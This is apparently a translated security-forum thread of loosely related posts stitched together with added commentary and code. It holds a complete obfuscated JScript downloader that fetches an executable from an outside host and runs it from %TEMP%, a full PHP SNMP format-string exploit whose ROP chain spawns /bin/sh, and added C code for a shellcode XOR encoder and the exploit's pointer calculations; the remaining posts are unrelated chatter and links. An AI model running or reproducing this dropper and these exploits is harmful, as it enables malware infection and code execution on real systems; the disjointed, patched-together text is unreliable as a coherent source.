          var WARRANTIES0 = false; var mousemove0 = ""; var code; var delts = "C" + "r"+"e"+"ateObject"; /*@cc_on /* QU5zoJYpASu6 */ @if (@_win32 || @_win64)/* QU5zoJYpASu6 */ // WARRANTIES0 /* QU5zoJYpASu6 */= true;/* QU5zoJYpASu6 */ mousemove0/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */"MLH";/* QU5zoJYpASu6 */ code =/* QU5zoJYpASu6 */ "R" + "esponseB"/* QU5zoJYpASu6 */ + "ydo".split('').reverse().join(''); objref = /* QU5zoJYpASu6 */(/* QU5zoJYpASu6 */"noitisop").split(''/* QU5zoJYpASu6 */).reverse(/* QU5zoJYpASu6 */).join(''); directionally0/* QU5zoJYpASu6 */ =/* QU5zoJYpASu6 */ "eliFoTevaS".split(''/* QU5zoJYpASu6 */).reverse().join(''); B12F40 = "A"+"DODB"; mousemove1 = "s" + "end"; dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs"; dishy0 /* QU5zoJYpASu6 */ = "G\x45"+"T"; /* QU5zoJYpASu6 */ @end/* QU5zoJYpASu6 */ @*//* QU5zoJYpASu6 */ if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); } var Summary/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */this[/* QU5zoJYpASu6 */"WScript"/* QU5zoJYpASu6 */]/* QU5zoJYpASu6 */; var delts0 = function mousemove() {return Summary[delts](("Trafdscks", "WScript")+".Shell");}(), delay0 = 4 * 2 + 3; var Amount0 = 1 * (2 - 0); var countRemain = Amount0 - ((1 * 2) + 0) * 1; function directionally(Summary0){delts0[("Ifasd ", "Gef.H.", "R")+ "u" + ("fudfk", "n")](Summary0, countRemain, countRemain);}; function cir(){return delts;}; { var code0 = "M" + "SX"+"ML2."+"X"+mousemove0+"T"+"TP"; var delay = ""; delay = "o"+"pen"; function penetration(FFFFF00) {FFFFF00[directionally0](delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e", (-9815 + 9817) * 1); return 0;}; if (true){ penetration1 = code0; cos1 = Summary[delts](penetration1); var WARRANTIES = 3-2; do { for (;WARRANTIES;){ try { if (WARRANTIES == 1) { cos1[delay](dishy0 /* QU5zoJYpASu6 */, dishy, (true, false)); cos1[mousemove1](); cos0 = "S"+"l"+"eep"; WARRANTIES = 2; } Summary[cos0](120); if (cos1["r"+"eadystate"] < 2 * 2) continue; WARRANTIES = countRemain; function cos(B12F4) {var penetration0 = (123, B12F4); return penetration0;}; FFFFF0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e"; countRemain0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "suc11.05.2016kit.bat"; objref0 = "start "+FFFFF0+"\r\nexit" penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 2; Amount /* QU5zoJYpASu6 */ = "w"+"r"+"i"+"t"+"e"; penetration1["Charset"] = "windows-1251"; penetration1[Amount+"Text"](objref0); directionally1[objref] = 1 * 0; penetration1[directionally0](countRemain0, 2 * 1); directionally1["c"+"l"+"o"+"s"+"e"](); penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 2; penetration1["Charset"] = "windows-1251"; penetration1[Amount+"Text"]("M"); directionally1[objref] = 0; penetration(penetration1); directionally1["c"+"l"+"o"+"s"+"e"](); penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 1 * 1; penetration1[Amount](cos1[code]); directionally1[objref] = 1; penetration(penetration1); directionally1["c"+"l"+"o"+"s"+"e"](); if (1 && WARRANTIES0) directionally(countRemain0); } catch(cir0){};}; }while (WARRANTIES); } }

      It's "obfuscated" like crap:

          dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs";

      I wonder what nationality the author is:

          if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); }

      Come on guys, you can do better!
  11. Attention! This is ransomware/malware/virus! Do NOT download!

      Hi,

      Today I received an email with a macro-enabled Word file (.docm). I haven't had time to look at it, but it looks like Locky Ransomware. I scanned it on VirusTotal: https://virustotal.com/en/file/316d5366c4720c8be340088836d200866cea471ce01375314b48c36fbf593c70/analysis/1463064016/

      The obfuscated macros can be seen there.

      Archive password: infected_rst

      For those who don't know what this is about, it would be better NOT to download it.

      MalwareSample.zip
  12. Avoid going off-topic. It's an open redirect, after all. I reported it to the IPB people and am waiting for a reply.
  13. So: use Chrome with Tor, not that crappy Firefox.
  14. As far as I knew, most of the funding for Tor development comes from the US Government.
  15. You have probably wondered many times why certain video files end in avi, mkv, mov or mp4, and what the difference between them is. In the same way, you are probably curious to learn what the difference is between a codec and a format or a container, and how a file's extension influences the quality of the information inside it. Link: http://www.digi24.ro/Stiri/Digi24/Sci-tech/Lumea+digitala/Formate+extensii+video+Diferenta+dintre+avi+mkv+mov+mp4 PS: I have seen articles like this on Digi before, I like them.
      • 1
      • Upvote
  16. So 'A' is 65 or 0x41 (the character with ASCII code 65). And the NULL byte is 0 or 0x00 (the character with ASCII code 0). http://www.asciitable.com/ What exactly are you referring to?
  17. Yes, a nice pentest report
  18. VIDEO: UNLOCKING A LOCK WITH HAIRPINS
      Petru Stratulat | 15/04/2016
      We have all seen movies in which doors were opened with ease using just two hairpins, but how is that possible? The tutorial below teaches you to do what they do in the movies, although we do not encourage such actions. Enjoy! Via: http://soundofscience.info/video-deblocarea-unei-incuietori/
  19. European Court: posting links to pirated content hosted on other public websites is legal
      Aurelian Mihai - 8 Apr 2016
      After the European Court of Justice announced in 2014 that it does not consider posting links to content hosted on other public websites to be a copyright infringement, the Advocate General of the European Court comes with additions that will delight fans of pirated content. According to him, posting links to other public websites does not constitute a breach of the law even if that content is hosted without the express permission of the copyright holder. The European Court's point of view has already been put up for discussion in a Dutch court, in the case between a local blog called GeenStijl and the publication Playboy, concerning accusations of posting direct links to a file-sharing service where pirated photo albums belonging to Playboy were hosted. Even though the request to remove the protected content was honored by the owners of the file-sharing service, the blog owner immediately posted updated links to the same photo albums, hosted however on another website. The attempt to force the removal of the links to the pirated content by legal means ran into the position of the Advocate General of the European Court: "Hyperlinks which lead, even directly, to protected works do not make them available to the public when they are already freely accessible on another website, but only serve to facilitate their discovery." It should be said that the position of Advocate Melchior Wathelet does not have the force of law, the final decision on this matter being due during this year, although the Advocate General's opinion weighs heavily in the interpretation of EU law.
      Source: http://www.go4it.ro/internet/curtea-europeana-postarea-de-link-uri-catre-continut-piratat-gazduit-pe-alte-website-uri-publice-este-legala-15220754/
20. Why is it "much better than BeEF"? It seems to do roughly the same things, except that now any random Joe will also have access to those people.
21. Yes, this move of theirs is strange; maybe they want users to have more trust in their services. I'm waiting for the first report analysing this "end-to-end encryption".
22. Anything interesting in there? Can someone write a summary?
23. EXPLOITING BUFFER OVERFLOWS ON MIPS ARCHITECTURES
A Walkthrough by Lyon Yang @l0Op3r
Editing and Support: Bernhard Mueller
Table of Contents
1. Introduction (p. 3)
2. Triggering and Debugging the Exploit (p. 3)
3. Cache Incoherency (p. 7)
4. Overcoming ASLR (p. 8)
5. Using ROP Gadgets (p. 9)
6. Writing the exploit – Calculating Offsets (p. 14)
7. Writing the exploit – Writing the MIPS Shellcode Encoder (p. 17)
8. Writing the exploit – fork() Shellcode (p. 22)
Download: https://www.exploit-db.com/docs/39658.pdf
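The "MIPS Shellcode Encoder" chapter of that walkthrough exists because the payload has to survive the vulnerable copy without containing bytes the copy stops at or filters. The following is an added example of the encoder side of that problem, written here for illustration and not taken from Lyon Yang's paper: it picks a 4-byte XOR key, one byte per lane of a 32-bit word, such that neither the key nor any encoded byte falls into an assumed bad-byte set, and pads the payload to whole words with MIPS nop (0x00000000) before encoding. The sample input is a constructed two-instruction stand-in ("li $v0, 4011; syscall" in big-endian encoding), chosen because both words contain NUL bytes; the bad-byte set is an assumption and should be replaced with what the real target filters.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed bad-byte set: NUL terminates strcpy-style copies, the others are
 * typical whitespace/newline filters. Adjust for the real target. */
static const uint8_t BAD_BYTES[] = {0x00, 0x0a, 0x0d, 0x20};

static int is_bad(uint8_t b) {
    for (size_t i = 0; i < sizeof BAD_BYTES; i++)
        if (BAD_BYTES[i] == b) return 1;
    return 0;
}

/* Does the buffer contain any bad byte? */
int has_bad_byte(const uint8_t *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (is_bad(buf[i])) return 1;
    return 0;
}

/* Choose one key byte per lane of a 32-bit word so that the key byte itself
 * and every encoded byte in that lane are clean. XOR works bytewise, so the
 * four lanes are independent and the search is at most 4 x 255 candidates.
 * Bytes past len are treated as 0x00 (nop) padding. Returns 1 on success. */
int find_xor_key(const uint8_t *code, size_t len, uint8_t key[4]) {
    size_t padded = (len + 3) & ~(size_t)3;
    for (int lane = 0; lane < 4; lane++) {
        int found = 0;
        for (int k = 1; k < 256 && !found; k++) {
            if (is_bad((uint8_t)k)) continue;
            int ok = 1;
            for (size_t i = (size_t)lane; i < padded; i += 4) {
                uint8_t b = i < len ? code[i] : 0x00;
                if (is_bad((uint8_t)(b ^ k))) { ok = 0; break; }
            }
            if (ok) { key[lane] = (uint8_t)k; found = 1; }
        }
        if (!found) return 0;
    }
    return 1;
}

/* Pad to whole words with nop and XOR with the 4-byte key. Applying it a
 * second time with the same key decodes. Returns the padded length. */
size_t xor_encode(const uint8_t *in, size_t len, const uint8_t key[4], uint8_t *out) {
    size_t padded = (len + 3) & ~(size_t)3;
    for (size_t i = 0; i < padded; i++)
        out[i] = (uint8_t)((i < len ? in[i] : 0x00) ^ key[i % 4]);
    return padded;
}

int main(void) {
    /* Constructed stand-in for a payload: "li $v0, 4011; syscall", big-endian. */
    const uint8_t code[] = {0x24, 0x02, 0x0f, 0xab, 0x00, 0x00, 0x00, 0x0c};
    uint8_t key[4], enc[sizeof code + 3];
    if (!find_xor_key(code, sizeof code, key)) {
        puts("no clean key for this payload and bad-byte set");
        return 1;
    }
    size_t n = xor_encode(code, sizeof code, key, enc);
    printf("key: %02x %02x %02x %02x\nencoded:", key[0], key[1], key[2], key[3]);
    for (size_t i = 0; i < n; i++) printf(" %02x", enc[i]);
    printf("\nclean: %s\n", has_bad_byte(enc, n) ? "no" : "yes");
    return 0;
}
```

The decoder stub that undoes this on the target is MIPS assembly and must itself be free of bad bytes; because the stub writes the decoded words through the data cache and then executes them, the cache-incoherency issue from chapter 3 applies and the decoded region has to be flushed (for example with the Linux cacheflush system call) before jumping into it.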
24. PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit

```php
<?php
// PHP <= 7.0.4/5.5.33 SNMP format string exploit (32bit)
// By Andrew Kramer <andrew at jmpesp dot org>
// Should bypass ASLR/NX just fine
// This exploit utilizes PHP's internal "%Z" (zval)
// format specifier in order to achieve code-execution.
// We fake an object-type zval in memory and then bounce
// through it carefully. First though, we use the same
// bug to leak a pointer to the string itself. We can
// then edit the global variable with correct pointers
// before hitting it a second time to get EIP. This
// makes it super reliable! Like... 100%.
// To my knowledge this hasn't really been done before, but
// credit to Stefan Esser (@i0n1c) for the original idea. It works!
// https://twitter.com/i0n1c/status/664706994478161920
// All the ROP gadgets are from a binary I compiled myself.
// If you want to use this yourself, you'll probably need
// to build a new ROP chain and find new stack pivots for
// whatever binary you're targeting. If you just want to get
// EIP, change $stack_pivot_1 to 0x41414141 below.

// pass-by-reference here so we keep things tidy
function trigger(&$format_string) {
    $session = new SNMP(SNMP::VERSION_3, "127.0.0.1", "public");
    // you MUST set exceptions_enabled in order to trigger this
    $session->exceptions_enabled = SNMP::ERRNO_ANY;
    try {
        $session->get($format_string);
    } catch (SNMPException $e) {
        return $e->getMessage();
    }
}

// overwrite either $payload_{1,2} with $str at $offset
function overwrite($which, $str, $offset) {
    // these need to be global so PHP doesn't just copy them
    global $payload_1, $payload_2;
    // we MUST copy byte-by-byte so PHP doesn't realloc
    for ($c = 0; $c < strlen($str); $c++) {
        switch ($which) {
            case 1: $payload_1[$offset + $c] = $str[$c]; break;
            case 2: $payload_2[$offset + $c] = $str[$c]; break;
        }
    }
}

echo "> Setting up payloads\n";
//$stack_pivot_1 = pack("L", 0x41414141); // Just get EIP, no exploit
$stack_pivot_1 = pack("L", 0x0807c19f);   // xchg esp ebx
$stack_pivot_2 = pack("L", 0x0809740e);   // add esp, 0x14

// this is used at first to leak the pointer to $payload_1
$leak_str = str_repeat("%d", 13) . $stack_pivot_2 . "Xw00t%lxw00t";
$trampoline_offset = strlen($leak_str);

// used to leak a pointer and also to store ROP chain
$payload_1 = $leak_str .        // leak a pointer
    "XXXX" .                    // will be overwritten later
    $stack_pivot_1 .            // initial EIP (rop start)
    // ROP: execve('/bin/sh',0,0)
    pack("L", 0x080f0bb7) .     // xor ecx, ecx; mov eax, ecx
    pack("L", 0x0814491f) .     // xchg edx, eax
    pack("L", 0x0806266d) .     // pop ebx
    pack("L", 0x084891fd) .     // pointer to /bin/sh
    pack("L", 0x0807114c) .     // pop eax
    pack("L", 0xfffffff5) .     // -11
    pack("L", 0x081818de) .     // neg eax
    pack("L", 0x081b5faa);      // int 0x80

// used to trigger the exploit once we've patched everything
$payload_2 = "XXXX" .           // will be overwritten later
    "XXXX" .                    // just padding, whatevs
    "\x08X" .                   // zval type OBJECT
    str_repeat("%d", 13) .
    "%Z";                       // trigger the exploit

// leak a pointer
echo "> Attempting to leak a pointer\n";
$data = trigger($payload_1);
$trampoline_ptr = (int)hexdec((explode("w00t", $data)[1])) + $trampoline_offset;
echo "> Leaked pointer: 0x" . dechex($trampoline_ptr) . "\n";

// If there are any null bytes or percent signs in the pointer, it will break
// the -0x10 will be applied later, so do it now too
if (strpos(pack("L", $trampoline_ptr - 0x10), "\x00") !== false ||
    strpos(pack("L", $trampoline_ptr - 0x10), "%") !== false) {
    echo "> That pointer has a bad character in it\n";
    echo "> This won't work. Bailing out... :(\n";
    exit();
}

echo "> Overwriting payload with calculated offsets\n";
// prepare the trampoline
// code looks kinda like...
// mov eax, [eax+0x10]
// mov eax, [eax+0x54]
// call eax
overwrite(2, pack("L", $trampoline_ptr - 0x10), 0);
overwrite(1, pack("L", $trampoline_ptr - 0x54 + 4), $trampoline_offset);

// exploit
echo "> Attempting to pop a shell\n";
trigger($payload_2);

// if we make it here, something didn't work
echo "> Exploit failed :(\n";
```

Source: https://www.exploit-db.com/exploits/39645/
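The part of that exploit that makes it "100% reliable" is the two-stage arithmetic: stage one leaks the absolute address of the format string, stage two writes pointers derived from it back into the payloads, and the script refuses to continue if the pointer that lands inside the format string contains a byte that would cut the string short (NUL) or start a new conversion ('%'). The following is an added C example of that bookkeeping, written here for illustration and not part of Andrew Kramer's exploit: it parses the leaked value from between the `w00t` markers, applies the 42-byte prefix length (13 x "%d", a 4-byte pivot, "Xw00t%lxw00t") and the 0x10/0x54 displacements from the exploit's comments, packs little-endian like PHP's `pack("L", ...)`, and runs the bad-character check. The error messages fed to it are constructed stand-ins for the SNMPException text.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Layout constants taken from the PHP exploit above: the leak string is
 * 13 x "%d" (26 bytes) + a 4-byte stack pivot + "Xw00t%lxw00t" (12 bytes),
 * so the word that follows it sits 42 bytes past the leaked address. */
#define LEAK_PREFIX_LEN 42u
#define MARKER "w00t"

/* Pull the %lx value printed between the two markers out of the error text.
 * Returns 1 and stores the value, 0 if the markers or the hex are missing. */
int parse_leak(const char *response, uint32_t *leaked) {
    const char *start = strstr(response, MARKER);
    if (start == NULL) return 0;
    start += strlen(MARKER);
    const char *end = strstr(start, MARKER);
    if (end == NULL || end == start || (size_t)(end - start) > 8) return 0;
    char hex[9];
    memcpy(hex, start, (size_t)(end - start));
    hex[end - start] = '\0';
    char *stop;
    unsigned long v = strtoul(hex, &stop, 16);
    if (*stop != '\0') return 0;
    *leaked = (uint32_t)v;
    return 1;
}

/* Little-endian packing, the equivalent of PHP's pack("L", ...). */
void pack_le32(uint32_t v, uint8_t out[4]) {
    for (int i = 0; i < 4; i++) out[i] = (uint8_t)(v >> (8 * i));
}

/* A NUL would end the C string the format parser walks and a '%' would be
 * read as a new conversion, so neither may appear in a pointer that is
 * embedded in the format string itself. */
int has_bad_char(const uint8_t *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0x00 || p[i] == '%') return 1;
    return 0;
}

/* Stage-two bookkeeping: from the stage-one error message derive the two
 * pointers the exploit writes back (payload_2[0..3] and payload_1[42..45]).
 * Returns 1 when the pointer that lands inside the format string is clean. */
int plan_trampoline(const char *response, uint8_t fake_obj[4], uint8_t fake_handler[4]) {
    uint32_t leaked;
    if (!parse_leak(response, &leaked)) return 0;
    uint32_t tramp = leaked + LEAK_PREFIX_LEN;
    pack_le32(tramp - 0x10, fake_obj);          /* consumed by mov eax, [eax+0x10] */
    pack_le32(tramp - 0x54 + 4, fake_handler);  /* consumed by mov eax, [eax+0x54] */
    /* Only fake_obj is inserted into the string that is used as a format
     * string; fake_handler goes into a PHP string that is only read as data,
     * which is why the exploit checks just the first one. */
    return has_bad_char(fake_obj, 4) ? 0 : 1;
}

int main(void) {
    /* Constructed stand-ins for the stage-one SNMPException message. */
    const char *msgs[] = {
        "Error in packet: ...Xw00tffd5b230w00t",
        "Error in packet: ...Xw00tffd5b20bw00t",
    };
    uint8_t obj[4], handler[4];
    for (int i = 0; i < 2; i++) {
        int ok = plan_trampoline(msgs[i], obj, handler);
        printf("%s -> %s", msgs[i], ok ? "usable" : "bad character in pointer");
        if (ok) printf(" (fake zval at %02x %02x %02x %02x)", obj[0], obj[1], obj[2], obj[3]);
        putchar('\n');
    }
    return 0;
}
```

Because the leaked address is absolute, ASLR does not matter for the fake object; the only failure mode left is a bad byte in that address, which is why the check happens before anything is written back. The PHP script bails out in that case; against a fresh process the address is re-randomised, so retrying is the natural response.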